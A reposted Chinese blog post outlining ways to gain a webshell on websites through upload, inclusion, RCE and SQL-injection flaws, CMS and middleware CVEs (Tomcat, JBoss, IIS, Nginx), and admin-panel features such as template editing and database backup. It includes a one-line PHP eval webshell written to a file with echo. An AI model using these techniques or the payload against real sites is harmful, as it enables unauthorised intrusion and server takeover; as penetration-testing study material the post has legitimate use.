0


获取WebShell思路

获取WebShell思路

一.通过漏洞点获取webshll

是指没有获得网站后台权限的时候,通过网站漏洞点获取webshll的方式。

1.常用漏洞洞获取webshll:

文件上传漏洞:
通过文件上传接口,上传一句话小马来获取webshll。
文件包含漏洞:
配合文件上传,上传图片拿shell、包含日志文件拿shell、通过远程包含,去请求自己服务器一句话木马文件等。
RCE执行漏洞:
执行命令行命令“写入如下内容到文件,会自动将创建木马文件并将一句话木马写入其中,使用连接工具连接即可。

echo?php "@eval($_POST['CE']);?>"> x.php 

SQL注入漏洞
前提条件:

  1. 要有file_priv权限
  2. 知道文件绝对路径
  3. 能使用union
  4. 对web目录有读权限
  5. 若过滤了单引号,则可以将函数中的字符进行hex编码
    利用方法:
    方法;
    ①可以通过log 备份、差异备份拿WebShell
    ②可以通过into outfile,into outfile函数(写入函数)将一句话木马写入,拿WebShell。
    ③利用phpmyadmin 将木马导出,拿WebShell
    ④利用连接外连的数据库拿WebShell
2.通过网站程序(CMS)来获取webshll

1.如何查看CMS相关信息?
如果已经攻破后台,那么进入后台之后CMS系统有可能直接显示
很多网站都会在网站的最下方信息中显示CMS版本信息
通过web指纹识别扫描器扫描
常用的为御剑WEB指纹识别系统
通过浏览器的插件查看指纹信息
火狐和Google可以用wappalyzer
2.通过CMS获取webshll方法
找到网站使用的cms版本信息后,通过搜索引擎搜索,就可以得到相关版本获取webshell的方法搜索关键字如:“wordpress拿webshell”,如果网上搜不到拿shll方法 就搜“wordpress”漏洞,通过漏洞点去拿shll。
如果网站是企业自己开发源代码,这个方式不实用。

二.通过网站使用的三方插件和中间件漏洞获取WEBshell

是指没有获得网站后台权限的时候,通过中间件漏洞获取WEBshell。

例如:
1.Tomcat
任意文件写入(CVE-2017-12615)影响版本:7.0.0-7.0.81(默认配置)
远程代码执行(CVE-2019-0232)影响版本:9.0.0.M1 ~ 9.0.17 , 8.5.0 ~ 8.5.39 , 7.0.0 ~ 7.0.93
文件包含漏洞(CVE-2020-1938)影响版本:7 ~ 7.0.099 、8 ~ 8.5.50 、9 ~ 9.0.30
2.JBoss
JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)
JBoss <=4.x JBossMQJMS 反序列化漏洞(CVE-2017-7504)
JBoss JMXInvokerServlet 反序列化漏洞
JBoss EJBInvokerServlet 反序列化漏洞
3.Java
Java反序列化(CVE-2015-7450)
4.利用web服务解析漏洞
IIS5.x / 6.0 解析漏洞
IIS 7.0 / IIS 7.5
Nginx <8.03 畸形解析漏洞
Nginx < 8.03 空字节代码执行漏洞
Apache 解析漏洞
5.常见编辑器漏洞
fckeditor、ewebeditor、cheditor

还有很多中间件漏洞可以帮我们快速获得webshll,这里不再做举例,当在我们需要获得webshll的时候,中间件漏洞拿shell是最快的。

三.通过网站后台获取webshll

此时我们已经破解了管理后台功能,可以使用管理后台的情况。
1.通过后台漏洞获取webshll。
一般情况下网站后台漏洞点会比较多,所以在后台能挖据出更多的漏洞点,漏洞利用获取webshll同上。
2.通过后台功能点来进获取 常见获取webshll功能点:
文件上传:
同上
模版修改:
通过对网站的模块进行编辑写入一句话,然后生成脚本文件拿WebShell
通过将木马添加到压缩文件,把名字改为网站模板类型,上传到网站服务器,拿WebShell
SQL执行:
同上,需要有一定数据库权限才可以成功。
利用后台数据库备份:
一般网站都不允许上传脚本类型文件,如 asp、php、jsp、aspx等文件。但一般后台都会有数据库备份功能。步骤如下
上传允许格式的小马(如图片马)
找到文件上传后的文件路径
通过数据库备份,指定备份源文件与与备份后格式。
修改网站上传类型配置:
某些网站,在网站上传类型中限制了上传脚本类型文件,我们可以去添加上传文件类型如添加asp | php | jsp | aspx | asa 后缀名来拿WebShell
文件包含
同上

获取webshll的方式有很多,这里仅以目前自己掌握的只是,提供一些思路参考。

标签: web安全 安全

本文转载自: https://blog.csdn.net/acepanhuan/article/details/129244314
版权归原作者 acepanhuan 所有, 如有侵权,请联系我们删除。

“获取WebShell思路”的评论:

还没有评论